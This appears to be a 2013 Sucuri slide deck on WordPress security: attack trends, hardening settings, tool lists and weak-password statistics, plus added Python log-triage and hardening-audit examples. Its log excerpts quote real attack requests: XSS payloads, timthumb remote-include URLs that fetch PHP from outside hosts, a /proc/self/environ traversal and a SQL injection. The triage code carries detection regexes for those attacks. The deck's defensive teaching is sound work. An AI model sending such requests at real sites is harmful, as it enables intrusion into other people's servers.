WordPress Website Security
  1. WordPress Website Security
  2. Specialization: Website Security, Incident Handling, Log Analysis. Special Interests: Warfare, Weapons, Martial Arts. Tony Perez | @perezbox | @sucuri_security, 5/1/2013
  3. Website Security Company; Global Operations; All Website Platforms; Scan 1M Unique Domains a Month; Block 1M web attacks a Month; 300–500 websites a day; Signature / Heuristic Based; 24/5 – 18/2 operations
  4. Trends, Threats, Defenses. SIMPLE RIGHT?
  6. Malicious Links (chart: 2011 vs 2012)
  8. Known Malware vs Unknown Malware (chart)
  9. Not Infected vs Infected (chart)
  10. (chart) Remote iFrame Includes 26%; Remote JavaScript Includes 19%; SPAM Injections 16%; Obfuscated / Encoded JavaScript 14%; Conditional Redirects 11%; Defacements 4%; Other 10%
  11. Apache, SSH, Email Server: going deeper than the application layer, targeting the server. Server Polymorphism, a.k.a. changes a lot
  12. Stick With Reputable Sources (Gravity Forms, JetPack Forms); Generating SPAM emails, resource hogs; IP blacklisting; Leverage Captchas
  14. Pharmacy; Payday Loans
  15. Access – so easy, yet so weak
  18. Site 1, Site 2, Site 3, Site 4 running WordPress 2.8, 3.5.1, 3.4.2 and 3.0
  25. W3TC & WP Super Cache – Remote Command Execution (RCE) Vulnerability; WPMM – SPAM Injections (Bad Plugin); Social Media Widget – SPAM Injections (Core Commit)
  26. Explosion in the Malware as a Service (MaaS) trade; Yes, pay someone to hack for you; Different tools to break in and generate payloads: brute force and vulnerability exploits, malware payloads; Blackhole Exploit Kit – today's market leader (2013 – SophosLabs)
  30. What kind of website do you have? Use for malware? Burrow into network? Steal data?
  31. Stored / Reflective, as seen in the access log:

        38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
        123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268

  32. Remote includes through timthumb.php / thumb.php and a directory traversal to /proc/self/environ, as seen in the access log:

        [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0"
        83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&sa=U&ei=vGBcUYS1IcOaiQLxu4HIBg&ved=0CCYQFjAE&usg=AFQjCNFN1APEnX9-WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
        82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

  33. SQL injection attempt, as seen in the access log:

        62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9"
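As an added example (not from the deck), a small Python triage that parses access-log lines like the ones on slides 31–33 and flags the four request classes shown, so the 200 responses among them stand out. The sample lines reuse the slides' request paths with documentation IP addresses substituted, and the rule patterns are this example's own heuristics, not a Sucuri signature set.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample: request paths are those quoted on slides 31-33 (the
# traversal run shortened); client IPs are replaced with documentation
# addresses (203.0.113.0/24) and the last, benign line is made up.
SAMPLE_LOG = [
    '203.0.113.1 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227',
    '203.0.113.2 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268',
    '203.0.113.3 - - [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983',
    '203.0.113.4 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../proc/self/environ%0000 HTTP/1.1" 302 -',
    '203.0.113.5 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336',
    '203.0.113.6 - - [03/Apr/2013:06:00:00 -0400] "GET /wp-content/uploads/2013/04/photo.jpg HTTP/1.1" 200 5120',
]

LOG_RE = re.compile(  # client, ident, user, [timestamp], "METHOD path proto", status
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}|-)')

# One heuristic per class on the slides, applied to the URL-decoded request so
# that %3Cscript%3E and <script> are treated alike.
RULES = {
    "xss": re.compile(r"<\s*/?\s*script|\bonerror\s*=|\bonload\s*=|javascript:", re.I),
    "rfi": re.compile(r"thumb\.php\?.*\bsrc=https?://", re.I),
    "traversal": re.compile(r"\.\./|/proc/self/environ|\x00"),
    "sqli": re.compile(r"\bunion\s+select\b|\bselect\s.+\bfrom\b", re.I),
}

def parse(line):
    """Fields of one access-log line, or None if it is not in this format."""
    m = LOG_RE.match(line)
    return dict(m.groupdict(), decoded=unquote_plus(m.group("path"))) if m else None

def classify(decoded_path):
    """Names of the classes whose pattern matches a URL-decoded request path."""
    return [name for name, rx in RULES.items() if rx.search(decoded_path)]

def triage(lines):
    """Flagged requests with client, response status and matched classes."""
    hits = []
    for rec in filter(None, map(parse, lines)):
        cats = classify(rec["decoded"])
        if cats:
            hits.append({"ip": rec["ip"], "status": rec["status"], "categories": cats})
    return hits

def summarize(lines):
    """Flagged requests per class, for a quick daily tally."""
    return dict(Counter(c for h in triage(lines) for c in h["categories"]))
```

Lines that are not in common/combined log format are skipped rather than guessed at; extend RULES with the patterns your own logs show rather than treating these four as complete.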
  36. Brand Reputation; Legal Implications; Impact to Sales; Blacklisted by Search Engines; Blacklisted by Payment processors; Worst Day Of your Life
  38. Access Control; Vulnerabilities; Hosting; Online Habits; Social Media; Passwords
  39. "It's about risk reduction… risk will never be zero…"
  40. We run on WordPress (current version, of course). Sucuri properties suffer ~125,000 web based attacks a month on average, ~4,000 attacks a day (this spikes on occasion); doesn't include server level attacks; all flavors of attacks
  41. Instead of telling you what you need to do, I'll just tell you what we do; our philosophy and approach is very simple: complex things break in complex ways; we focus on the areas that we can immediately control; we believe in layered defenses
  42. Stay Current; IP Whitelisting; Two Factor Authentication; Strong / Unique Password; Web Application Firewall
  43. IP Whitelisting; Server Isolation; Public Key Authentication; Host Intrusion Detection System (HIDS); Log Everything
  44. What we use:

     | Category | Tool | Type |
     |---|---|---|
     | Prevention – Software Vulnerabilities | Sucuri CloudProxy | Service |
     | Prevention – Access Control | Sucuri CloudProxy | Service |
     | Detection | Sucuri Monitoring | Service |
     | Remediation | Sucuri | Service |
     | Password Management | 1Password / LastPass | Application |
     | Host-based Intrusion Detection System | OSSEC | Application |
     | Access Control Enforcement | Login Secure Solutions | Plugin |
     | Two-Factor Authentication | Google Authenticator | Plugin |
     | Application Auditing | Sucuri Premium | Plugin |
     | Backups | BackupBuddy | Plugin |

  45. Hardening settings:

     | Category | Location | Type |
     |---|---|---|
     | Disable Theme / Plugin Editor | wp-config.php | Preventive measure |
     | Disable PHP execution | .htaccess – uploads / images / wp-includes / etc. | Preventive measure |
     | Permissions | Directories 755 / Files 644 | Preventive measure |
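An added example, not from the deck, that checks the three slide-45 settings as a Python audit: it flags permissions looser than 755/644, confirms wp-config.php defines WordPress's DISALLOW_FILE_EDIT as true, and looks for an .htaccess block that denies .php files under uploads (the Files/FilesMatch form it expects is an assumption; other ways of disabling PHP are not recognised).

```python
import os
import re
import stat

# Policy from slide 45: directories 755, files 644, the theme/plugin editor
# switched off in wp-config.php (WordPress's DISALLOW_FILE_EDIT constant) and
# an .htaccess under uploads/ that refuses to serve .php files.
DIR_MODE, FILE_MODE = 0o755, 0o644

def walk_modes(root):
    """Yield (path, is_dir, permission bits) for everything below root."""
    for dirpath, dirnames, filenames in os.walk(root):
        for name, is_dir in [(d, True) for d in dirnames] + [(f, False) for f in filenames]:
            p = os.path.join(dirpath, name)
            yield p, is_dir, stat.S_IMODE(os.lstat(p).st_mode)

def loose_entries(entries):
    """Entries granting any bit the policy does not (e.g. 777 dirs, 664 files)."""
    bad = []
    for path, is_dir, mode in entries:
        allowed = DIR_MODE if is_dir else FILE_MODE
        if mode & ~allowed:
            bad.append((path, oct(mode), oct(allowed)))
    return bad

def file_edit_disabled(wp_config):
    """True when wp-config.php has an uncommented define('DISALLOW_FILE_EDIT', true)."""
    for line in wp_config.splitlines():
        code = line.split("//")[0].split("#")[0]  # ignore single-line comments
        if re.search(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", code, re.I):
            return True
    return False

def php_blocked(htaccess):
    """True when a <Files>/<FilesMatch> block naming .php denies access
    (Apache 2.2 'deny from all' or 2.4 'Require all denied'); assumed form."""
    block = re.search(r"<Files(?:Match)?\s+[^>]*php[^>]*>(.*?)</Files(?:Match)?>", htaccess, re.I | re.S)
    return bool(block and re.search(r"deny\s+from\s+all|require\s+all\s+denied", block.group(1), re.I))

def audit(entries, wp_config, uploads_htaccess):
    """Slide-45 checklist as a dict of findings; an empty dict means all three hold."""
    findings = {}
    loose = loose_entries(entries)
    if loose:
        findings["permissions"] = loose
    if not file_edit_disabled(wp_config):
        findings["file_edit"] = "DISALLOW_FILE_EDIT is not defined as true"
    if not php_blocked(uploads_htaccess):
        findings["php_execution"] = "uploads/.htaccess does not deny .php files"
    return findings
```

On a live install, feed `audit(walk_modes("/path/to/wordpress"), open("wp-config.php").read(), open("wp-content/uploads/.htaccess").read())`; treat a non-empty result as a to-do list, not proof of compromise.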
  46. Don't know what you're doing? Go with a managed host…
  47. Doesn't mean you won't ever get infected.
  48. Complex . Long . Unique . Esoteric – "CLUE". Username and password counts (Epic Fail):

     Usernames: admin 652,911; test 10,173; administrator 8,992; Admin 8,921; root 2,495
     Passwords: admin 16,798; 123456 10,880; 666666 9,727; 111111 9,106; 12345678 7,882; qwerty 7,717; 1234567 7,295

  49. Access – Login Secure Solution, Stealth Login, Limit Login; Scanning – WordFence, Anti-Malwatch; Defense in Depth – BetterWP Security, BulletProof Security; Vulnerabilities – MVIS Security Center
  50. Resources:

     | Name | URL |
     |---|---|
     | Sucuri Blog | http://blog.sucuri.net |
     | SucuriTV | http://sucuri.tv |
     | WordPress Forum – Hacked | http://wordpress.org/tags/hacked |
     | WordPress Forum – Malware | http://wordpress.org/tags/malware |
     | Badware Busters | https://badwarebusters.org |
     | Perishable Press | http://perishablepress.com/category/web-design/security/ |
     | Google Forums | http://productforums.google.com/forum/#!categories/webmasters/malware--hacked-sites |
     | WordPress.org Hardening | http://codex.wordpress.org/Hardening_WordPress |
     | Google Webmaster Tools | http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 |
     | Secunia Security Advisories | http://secunia.com/community/advisories/search/?search=wordpress |
     | Exploit-DB | http://www.exploit-db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 |